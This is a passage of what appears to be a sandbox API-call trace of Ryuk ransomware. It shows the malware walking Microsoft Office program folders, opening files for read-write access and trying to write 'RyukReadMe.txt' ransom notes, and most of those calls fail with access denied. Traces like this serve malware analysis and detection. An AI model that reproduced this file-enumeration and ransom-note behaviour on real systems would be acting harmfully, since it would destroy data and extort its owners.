VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.669] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.669] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.669] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.670] SetLastError (dwErrCode=0x0) [0136.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.673] GetLastError () returned 0x5 [0136.673] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.673] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.673] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.673] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM", dwFileAttributes=0x80) returned 0 [0136.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\act3.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.674] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.674] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.674] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.674] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE", dwFileAttributes=0x80) returned 0 [0136.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimdos.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.675] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.675] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.675] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.675] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE", dwFileAttributes=0x80) returned 0 [0136.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimwin.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.676] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.676] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.676] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.676] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM", dwFileAttributes=0x80) returned 0 [0136.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\desksam.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.677] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.677] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.677] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM", dwFileAttributes=0x80) returned 0 [0136.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\odbc.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.678] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.678] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.678] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.678] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.678] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM", dwFileAttributes=0x80) returned 0 [0136.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\ol.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.679] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.679] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.679] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.679] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.679] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE", dwFileAttributes=0x80) returned 0 [0136.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oladd.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.680] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.680] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.680] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.680] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE", dwFileAttributes=0x80) returned 0 [0136.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olappt.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.681] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.681] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.681] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.681] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE", dwFileAttributes=0x80) returned 0 [0136.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oljrnl.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.682] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.682] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.682] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.682] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.682] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE", dwFileAttributes=0x80) returned 0 [0136.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olmail.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.683] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.683] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.683] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.683] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.683] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE", dwFileAttributes=0x80) returned 0 [0136.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olnote.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.684] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.684] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.684] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.684] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE", dwFileAttributes=0x80) returned 0 [0136.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oltask.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.684] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.684] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.685] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.685] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM", dwFileAttributes=0x80) returned 0 [0136.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\org97.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.685] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.686] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.686] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.686] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.686] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM", dwFileAttributes=0x80) returned 0 [0136.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\pab.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.687] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.687] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.687] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.687] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.687] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.687] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.687] SetLastError (dwErrCode=0x0) [0136.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.687] GetLastError () returned 0x5 [0136.687] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.687] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.687] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.687] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.687] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.687] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.687] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc", dwFileAttributes=0x80) returned 0 [0136.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc" (normalized: "c:\\program files\\microsoft office\\office14\\custom.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.688] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.688] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.688] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.688] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.688] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.688] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.688] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.688] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.688] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.688] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.688] SetLastError (dwErrCode=0x0) [0136.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.688] GetLastError () returned 0x5 [0136.688] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.688] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.688] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.688] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.688] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.688] SetLastError (dwErrCode=0x0) [0136.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.689] GetLastError () returned 0x5 [0136.689] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.689] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.689] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.689] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.689] SetLastError (dwErrCode=0x0) [0136.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.689] GetLastError () returned 0x5 [0136.689] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.689] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0136.689] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.689] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.689] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.690] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\Built-In Building Blocks.dotx", dwFileAttributes=0x80) returned 0 [0136.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\1033\\14\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.690] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.690] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0136.690] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0136.690] SetLastError (dwErrCode=0x0) [0136.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\1033\\14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.690] GetLastError () returned 0x5 [0136.690] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.690] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.690] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.690] SetLastError (dwErrCode=0x0) [0136.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.691] GetLastError () returned 0x5 [0136.691] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.691] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.691] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.691] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.691] SetLastError (dwErrCode=0x0) [0136.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.691] GetLastError () returned 0x5 [0136.691] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.691] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.691] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.691] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.691] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.691] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.691] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.691] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.691] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.691] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.691] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.691] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.691] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGDIC.DAT", dwFileAttributes=0x80) returned 0 [0136.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGDIC.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\engdic.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.692] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.692] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.692] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.692] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGIDX.DAT", dwFileAttributes=0x80) returned 0 [0136.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGIDX.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\engidx.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.692] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.692] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.692] 